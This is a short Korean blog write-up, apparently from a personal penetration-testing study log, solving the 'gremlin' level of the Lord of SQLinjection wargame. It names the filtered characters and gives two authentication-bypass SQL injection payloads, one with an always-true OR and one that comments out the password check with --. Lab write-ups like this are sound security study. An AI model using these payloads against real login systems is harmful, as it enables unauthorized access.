본문 바로가기
모의해킹/Lord of SQLinjection

gremlin

철민1234 2023. 5. 28. 15:18
728x90

gremlin 문제

문제 풀이 

1. 필터링 확인 

_ , \. , ()을 사용하는 경우 No Hack 페이지로 넘어간다.

 

2. 페이로드 구문

select id from prob_gremlin where id='admin' and pw='123'or '1=1'  구문을 pw 부분을 참으로 만들어 준다.

 

다른 방법의 페이로드

select id from prob_gremlin where id='admin' or '1=1--' and pw ='' 구문은 --으로 pw 부분을 주석 처리해 준다.

'모의해킹 > Lord of SQLinjection' 카테고리의 다른 글

darkelf  (0) 2023.06.01
wolfman  (0) 2023.06.01
orc  (0) 2023.05.29
goblin  (0) 2023.05.29
cobolt  (0) 2023.05.28

'모의해킹/Lord of SQLinjection' Related Articles

티스토리툴바